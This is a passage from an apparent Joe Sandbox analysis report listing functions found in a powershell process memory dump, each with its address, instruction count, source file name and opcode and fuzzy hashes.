                                                                                          • Opcode Fuzzy Hash: 21450ce656ec02444971c640b6ac0b6fe223ea85826c8d5370f1b03b5c5dfeaf
                                                                                          • Instruction Fuzzy Hash: 08217CB89057448FDB64CF6AC08838AFFF6EF88320F28C02ED55D97255D77464818B65
                                                                                          Function 04CDDE81 Relevance: .1, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 75e86582da134f0d467b4caacc035a8264e567b20fca23765d86684063170e3e
                                                                                          • Instruction ID: 976ffb995cd44eed06e069bade68153f6fd7a0aca22790738ca8d19b4c90ab2e
                                                                                          • Opcode Fuzzy Hash: 75e86582da134f0d467b4caacc035a8264e567b20fca23765d86684063170e3e
                                                                                          • Instruction Fuzzy Hash: 91113631E04548DFCF18DA68D8044ECFBB3EB9D360F188469DA07DB356DA306A52DBA4
                                                                                          Function 04CD7664 Relevance: .1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 52ef69420fe63dcc5cb87f851f7275d194281047fbbd18a946846e8b4e98df3d
                                                                                          • Instruction ID: d3990244c242aab219725051effe45a72b15a4277d21c5671f570d20f80d1f86
                                                                                          • Opcode Fuzzy Hash: 52ef69420fe63dcc5cb87f851f7275d194281047fbbd18a946846e8b4e98df3d
                                                                                          • Instruction Fuzzy Hash: B911EC3AB00118CFDB14DFA8D9409DE7BF6EBC8225B1540A5E609DB365DA31ED168B90
                                                                                          Function 04CDE4C0 Relevance: .1, Instructions: 61COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 738fba2389c43ec9797d5aad4293b14047d4d769bc46ef111ef2769d2567bbef
                                                                                          • Instruction ID: b326c97a93e11ab7b0f248dcdf5a6f460004776b061c3774b9262a4bcd8033aa
                                                                                          • Opcode Fuzzy Hash: 738fba2389c43ec9797d5aad4293b14047d4d769bc46ef111ef2769d2567bbef
                                                                                          • Instruction Fuzzy Hash: A021CD72801749CFDB10CF99C90479EBBF4EF49760F188069C508AB241E738E645CF61
                                                                                          Function 04CDBCE8 Relevance: .1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7ed9aa21ebbfdac84dec6926214ef938a60fe535eeb5daea46813c07d9d9bdc7
                                                                                          • Instruction ID: 0dedf4d9eecde54b5deda611d970288b55d11ef841353a935a57cd038dc85db5
                                                                                          • Opcode Fuzzy Hash: 7ed9aa21ebbfdac84dec6926214ef938a60fe535eeb5daea46813c07d9d9bdc7
                                                                                          • Instruction Fuzzy Hash: 1811C4316083448FD724DB76D594A5A7FE2EF46250F1584AED19EC7666DB30FC41C700
                                                                                          Function 04CDDE30 Relevance: .1, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0cfa86ec6686daee9709f817841f57e117053d9e16cc75dd7451a8f92513cb4b
                                                                                          • Instruction ID: edee8c20448c395f28b0b6f271a253df6e41f1609236baa06affdad8058bffdc
                                                                                          • Opcode Fuzzy Hash: 0cfa86ec6686daee9709f817841f57e117053d9e16cc75dd7451a8f92513cb4b
                                                                                          • Instruction Fuzzy Hash: EA014736B006509BCB19965D9C408EEFBABCED96A130940AFD21BCB644CA21AD0287E1
                                                                                          Function 04CDE4D0 Relevance: .1, Instructions: 51COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8267dbb0e7e5e77216f4005ebaae7eadb35b27cbb2c7ad20ef8f1de5c4523951
                                                                                          • Instruction ID: eea336e49b0f929450d1ce77209616be29a1b29e28f6e38413db7902dc4e309e
                                                                                          • Opcode Fuzzy Hash: 8267dbb0e7e5e77216f4005ebaae7eadb35b27cbb2c7ad20ef8f1de5c4523951
                                                                                          • Instruction Fuzzy Hash: 4E116AB19007098FDB10CF9AC50479EBBF4EF48360F28806DD509AB240E779E640CFA5
                                                                                          Function 04CDE0C8 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8d2139ef00672c6a44f3a99417e6daa7090f2c577ffec44cd2cccdd760b30bc2
                                                                                          • Instruction ID: 1da8aa3541f3ed76587e01e5306a79db7f2e8a0f74a52c61b17093ef1c2b2950
                                                                                          • Opcode Fuzzy Hash: 8d2139ef00672c6a44f3a99417e6daa7090f2c577ffec44cd2cccdd760b30bc2
                                                                                          • Instruction Fuzzy Hash: CB0140357002149FCB159B74E8086AEFBF6FB89359B14816DE51AD3242DB31A911CB91
                                                                                          Function 04CDE040 Relevance: .0, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cbb9356c6874280f90fd88042a7d0c93501174700da03745d986d49b25b45f61
                                                                                          • Instruction ID: a7731dd71fb554985b53e6458add51fb958d12679182d7699b0290a674e05d7c
                                                                                          • Opcode Fuzzy Hash: cbb9356c6874280f90fd88042a7d0c93501174700da03745d986d49b25b45f61
                                                                                          • Instruction Fuzzy Hash: 5811F735204750CFC728DF35D440996BBF6EF8921536489ADD48A8BBA0CB32F845CB50
                                                                                          Function 04CDBF18 Relevance: .0, Instructions: 45COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 762302094518b5910c36584c10064a30f414290fc121041edbc8895a5eb38063
                                                                                          • Instruction ID: 48f159e56603e14ab994eef9b19e9ba6a86cfc3667f861b8684ba04a5e35d729
                                                                                          • Opcode Fuzzy Hash: 762302094518b5910c36584c10064a30f414290fc121041edbc8895a5eb38063
                                                                                          • Instruction Fuzzy Hash: 23F028363093A05FD7154A758C4097BBFF9EF8665070500ABFA44CB362DAB0DD008760
                                                                                          Function 04CD90E0 Relevance: .0, Instructions: 44COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6e897f1bd8987d6870d20f081f80cd7f9adb9abacb2021585c3e012dcbed27e
                                                                                          • Instruction ID: e9f17cd96700840641467f42185f5bd66b67f7c1e2d0ec5dff1a18ba0ccd4bb3
                                                                                          • Opcode Fuzzy Hash: f6e897f1bd8987d6870d20f081f80cd7f9adb9abacb2021585c3e012dcbed27e
                                                                                          • Instruction Fuzzy Hash: 34012BB6A44340CBE711AB34945439A7FA2EBC6224F5880ABC5554F286CE396906C7B1
                                                                                          Function 04CD7940 Relevance: .0, Instructions: 41COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bf674c0db90c39431ac92fd451ca1a66715520abc9bdd24354d1593f89d8f099
                                                                                          • Instruction ID: 13ef159844cdacd74ca4e0ae9f8681c50a28f9d9e116ec3ef44c6b6a2a0f433b
                                                                                          • Opcode Fuzzy Hash: bf674c0db90c39431ac92fd451ca1a66715520abc9bdd24354d1593f89d8f099
                                                                                          • Instruction Fuzzy Hash: 31F04631306380AFD70297249884A6F7FE5DF8A62070009AEE189C7792CF386C86C771
                                                                                          Function 04CD9549 Relevance: .0, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d2ac879447c23f0be87262f2658d1c0d008a31d898e1c7d97fc484ed7b88377e
                                                                                          • Instruction ID: 43b375927d0b7eaaf8fb529980de9095e1c5411afcfd80e627ccd2b678372018
                                                                                          • Opcode Fuzzy Hash: d2ac879447c23f0be87262f2658d1c0d008a31d898e1c7d97fc484ed7b88377e
                                                                                          • Instruction Fuzzy Hash: 38F05965B46284D79B1076B5440066ABE9B8EC7150B0C0376CB1587346FD31F8029370
                                                                                          Function 04CDDFE0 Relevance: .0, Instructions: 35COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3677a3d648674c37e99cfafccd4288bde0cf86173f113b37ff2da60d78ce2acf
                                                                                          • Instruction ID: 00f27b73c7953feb1c2e048ff7dab7a52fd1b9852db3e96720f0efaf0c740873
                                                                                          • Opcode Fuzzy Hash: 3677a3d648674c37e99cfafccd4288bde0cf86173f113b37ff2da60d78ce2acf
                                                                                          • Instruction Fuzzy Hash: E3F05E387081408FC7108B29D89486ABBF6EFCA61531910AAE295CF736DA61EC01DB50
                                                                                          Function 04CD9160 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0135ea6e493cf1aba33781e775e14441c14e1a4e86e7da7e1304a94e675f0f4
                                                                                          • Instruction ID: 2e8ef8eafb51059e6715a6191cb514527b6db42c3f1039f1530c770d186d649b
                                                                                          • Opcode Fuzzy Hash: e0135ea6e493cf1aba33781e775e14441c14e1a4e86e7da7e1304a94e675f0f4
                                                                                          • Instruction Fuzzy Hash: 4CF0E9799093408FE760AB78D49C39AFFE5EB05360F04885ED24EC7282DB357884C750
                                                                                          Function 04CD7950 Relevance: .0, Instructions: 33COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 32df2b971fa60f0e134c57ed2af3212dbfc373e8299f12aa8492a4fdf962844c
                                                                                          • Instruction ID: 34d1e0dca339493b3709e9072b265eabb095f7e5aff2c9edf0b3bf8e159b1032
                                                                                          • Opcode Fuzzy Hash: 32df2b971fa60f0e134c57ed2af3212dbfc373e8299f12aa8492a4fdf962844c
                                                                                          • Instruction Fuzzy Hash: B2F0A7727006149FD7149A69D88497F77EAEBC8271B00092DE20AD7351DF70AD0287A0
                                                                                          Function 04CD767F Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 51990fe08f160217621ae51182414ac922265492212237e51bf682e47a60e761
                                                                                          • Instruction ID: 781cc761ce1c80c9c1b717014151f90f9c48e25e024615e95cd9e40ab6dcdbe3
                                                                                          • Opcode Fuzzy Hash: 51990fe08f160217621ae51182414ac922265492212237e51bf682e47a60e761
                                                                                          • Instruction Fuzzy Hash: 92F0A0397001188FDB10EBADDC4099A7BA2EFC9655B154195EB09DB365EE30DC038B90
                                                                                          Function 04CD90F0 Relevance: .0, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d613b0c76c14c0aec5521d4d873585fa9a7837d32883991ed72af3fd2561408e
                                                                                          • Instruction ID: 5c69e8954bd4c7af894c8c49d06987cccaaed6c0a179b2fa328fec254dc91224
                                                                                          • Opcode Fuzzy Hash: d613b0c76c14c0aec5521d4d873585fa9a7837d32883991ed72af3fd2561408e
                                                                                          • Instruction Fuzzy Hash: C3F02779A40204CBE700BB64C0483AB7796DBC0328F50813AC91A4B388CE396C42C7F0
                                                                                          Function 04CDDFF0 Relevance: .0, Instructions: 30COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f30303dce77df31b0a10630d506cda76ea5d34afce78a605bc9322fad451e74b
                                                                                          • Instruction ID: 841cd56ccd17d49e9e989a7eca731023455714d24656eed394f582b97f5820f4
                                                                                          • Opcode Fuzzy Hash: f30303dce77df31b0a10630d506cda76ea5d34afce78a605bc9322fad451e74b
                                                                                          • Instruction Fuzzy Hash: 4FE012353005108F87109F1DD494C6AB7FAEFCE71575510AAE645CF725DA61FC01DB90
                                                                                          Function 04CDAF90 Relevance: .0, Instructions: 29COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7d5c075dd8d3461f84a88de55b8f90f9016b7f391e21c11d398c092beaeafb02
                                                                                          • Instruction ID: 652a29056d1472bbf3adecfce007ee039a4f7115a4ad804cf30a3b2998c06dbf
                                                                                          • Opcode Fuzzy Hash: 7d5c075dd8d3461f84a88de55b8f90f9016b7f391e21c11d398c092beaeafb02
                                                                                          • Instruction Fuzzy Hash: E7E0206170C3D15B872E802D5C5046ABF678AC357130C44F7A344CF342DD63AC054390
                                                                                          Function 04CD8973 Relevance: .0, Instructions: 26COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 259544eaf84be5939f6bc135207d35e8fdc3a41f8242999e7f50071a5c0af114
                                                                                          • Instruction ID: dbde3a09dfce01d36b7ecd82def47bd94523a01a03902bf214a4dbb9077de1bf
                                                                                          • Opcode Fuzzy Hash: 259544eaf84be5939f6bc135207d35e8fdc3a41f8242999e7f50071a5c0af114
                                                                                          • Instruction Fuzzy Hash: 60E0923571871197DB0D2775940C2AEBA96EBC5729F04402EE60A83246CF655811C3D9
                                                                                          Function 04CD8739 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 65b75743a7b41bc495f6b63b7e12e1a0c4c8af832eee65c605cc62cfffbff5a1
                                                                                          • Instruction ID: 630e93c5c46597809f8a7b91acb0df9a1e629487fd44184ddd1e1780d6267a57
                                                                                          • Opcode Fuzzy Hash: 65b75743a7b41bc495f6b63b7e12e1a0c4c8af832eee65c605cc62cfffbff5a1
                                                                                          • Instruction Fuzzy Hash: 76E06830804349CFCF05BBBAC8498FDFF30EA01301B0100ADE62381186EA30669ACBC0
                                                                                          Function 04CD9170 Relevance: .0, Instructions: 25COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 405358f40e7c6d384f7a1fd004cf7d48547ae9fbe6e079f5878e06447ae21731
                                                                                          • Instruction ID: 492fc1d5d0169963a3314e6595b3dd17c8e25d7b2947d0b875dd1cb17a55f080
                                                                                          • Opcode Fuzzy Hash: 405358f40e7c6d384f7a1fd004cf7d48547ae9fbe6e079f5878e06447ae21731
                                                                                          • Instruction Fuzzy Hash: 2EF06D749003048BD7A4EFB8D49C79ABBE5EB44360F00482DE61EC7241DB35A880CB90
                                                                                          Function 04CD8978 Relevance: .0, Instructions: 24COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3ffbab3a025633809b8785c68bd5d906a9537686b3d5ee6d20a30834490a61f8
                                                                                          • Instruction ID: 864ed2f0494fd467d5568e044e4a6cd042635a13044ca035bea71bb30252a85d
                                                                                          • Opcode Fuzzy Hash: 3ffbab3a025633809b8785c68bd5d906a9537686b3d5ee6d20a30834490a61f8
                                                                                          • Instruction Fuzzy Hash: E8E0263570831097CB0D3779A40C2AEBB96EBC5728F04402ED7068338ACF78581183D9
                                                                                          Function 04CD9558 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2b075e4750f2ac6354ea9d967917e3918540970e30d814aa1dd9a72dc6797ed1
                                                                                          • Instruction ID: f0117f102d58a9f1a78a9c1fca18765647f3045fdcbdf4a52123c904a7019d30
                                                                                          • Opcode Fuzzy Hash: 2b075e4750f2ac6354ea9d967917e3918540970e30d814aa1dd9a72dc6797ed1
                                                                                          • Instruction Fuzzy Hash: F8D0A7127412218B5A5471FE1800BBBB5CFCEC54E5B4502369B15C3355FD50FC0613F1
                                                                                          Function 04CDDE90 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction ID: d9a6869b8ca344ca5428fee7774192c7a7d844616053a4bfc554c62234a6e20c
                                                                                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                                                                          • Instruction Fuzzy Hash: CBE08631B00014978B08959ED4504D9F7A7DFCC220F08847ADA0AA7340DA3269168691
                                                                                          Function 04CDDE40 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1466f3f881f3066e6a1ffd3b50ce1c6c59d5fa29081acb552302e5518a04881c
                                                                                          • Instruction ID: b6584a7531557f0c1db0774ad9aeae70b8a2bf1cdee77aa5de4b4e08be8007af
                                                                                          • Opcode Fuzzy Hash: 1466f3f881f3066e6a1ffd3b50ce1c6c59d5fa29081acb552302e5518a04881c
                                                                                          • Instruction Fuzzy Hash: 14E0C275B00710978729A65EA80089FBBEBDFC4AB1311842EE11AC7708DE68ED0187D5
                                                                                          Function 04CD8800 Relevance: .0, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fd6a9b3e4e126ff1d7055714cc6dd6d9b38770eac9ff02e0134a3ea343870d1c
                                                                                          • Instruction ID: 3150cb740b76148bc069dca14dfd86b37e784ee4a80dbf7ec83d449bf72cb7c5
                                                                                          • Opcode Fuzzy Hash: fd6a9b3e4e126ff1d7055714cc6dd6d9b38770eac9ff02e0134a3ea343870d1c
                                                                                          • Instruction Fuzzy Hash: 17E06830D1834A8B8314EB60C80252DFFF2DB11301B04803ADEA497346DA307940CBD0
                                                                                          Function 04CDF600 Relevance: .0, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7ad11272a4dd0a13063f5a8e5b3b27054cf3b6d6d3440eaf71c2580250ed2862
                                                                                          • Instruction ID: 0e88544ae348f97b2968f64c24ebb7dc166d6bc0b0678e2407701c0bfcc86706
                                                                                          • Opcode Fuzzy Hash: 7ad11272a4dd0a13063f5a8e5b3b27054cf3b6d6d3440eaf71c2580250ed2862
                                                                                          • Instruction Fuzzy Hash: 43E0DFB09002866ACBA1CB388440095FFF0AA0A274B1482EE98598B292EA325503CBC1
                                                                                          Function 04CDF610 Relevance: .0, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction ID: 30a3aeda2c3b062f41d0ce573321b1704ccee97159a9f97ee4c40771534c8087
                                                                                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                                                                          • Instruction Fuzzy Hash: F8D067B0D0420D9F8B80EFADC94156EFBF5EB4C214F6485AE8919E7351F7329A128BD1
                                                                                          Function 04CD8748 Relevance: .0, Instructions: 15COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.2499332687.0000000004CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CD0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_11_2_4cd0000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bb849ed33b4d456aacbf0cdb858005a6ebfc998fdcd0e4b6132fb7997cb691a6
                                                                                          • Instruction ID: 80bc80dba187545bc2b9a55af7bd59bbd13baf77fcea4fe112129a5cf8aadd08
                                                                                          • Opcode Fuzzy Hash: bb849ed33b4d456aacbf0cdb858005a6ebfc998fdcd0e4b6132fb7997cb691a6
                                                                                          • Instruction Fuzzy Hash: 00D012308142098FCB48BB65E81A4BDBB34FA10301F41415DD91752196EA31169ACAC0
